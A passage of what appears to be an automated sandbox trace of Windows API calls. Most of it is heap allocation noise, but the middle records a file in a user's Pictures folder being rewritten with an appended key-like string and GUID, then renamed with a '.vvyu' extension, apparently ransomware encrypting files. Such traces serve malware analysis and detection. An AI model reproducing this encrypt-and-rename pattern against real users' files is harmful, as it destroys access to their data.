dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.714] GetCurrentThreadId () returned 0x264 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46d80 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.714] GetCurrentThreadId () returned 0x264 [0195.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a198 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42808 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.726] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xf33a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xf33a, lpOverlapped=0x0) returned 1 [0195.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0195.727] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xf33f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.727] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.728] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.729] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.729] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.729] CloseHandle (hObject=0x52c) returned 1 [0195.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d2cc80 [0195.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.753] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\hM HT 9rGnc6u.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\hm ht 9rgnc6u.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\k4vLze9TyD\\hM HT 9rGnc6u.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\k4vlze9tyd\\hm ht 9rgnc6u.gif.vvyu")) returned 1 [0195.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.757] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.760] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d2b700, ftCreationTime.dwHighDateTime=0x1d899e2, ftLastAccessTime.dwLowDateTime=0xbe9b4680, ftLastAccessTime.dwHighDateTime=0x1d8a2e4, ftLastWriteTime.dwLowDateTime=0xbe9b4680, ftLastWriteTime.dwHighDateTime=0x1d8a2e4, nFileSizeHigh=0x0, nFileSizeLow=0xf33f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hM HT 9rGnc6u.gif", cAlternateFileName="HMHT9R~1.GIF")) returned 0 [0195.760] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0195.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0195.761] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0195.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0195.761] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0195.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0195.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 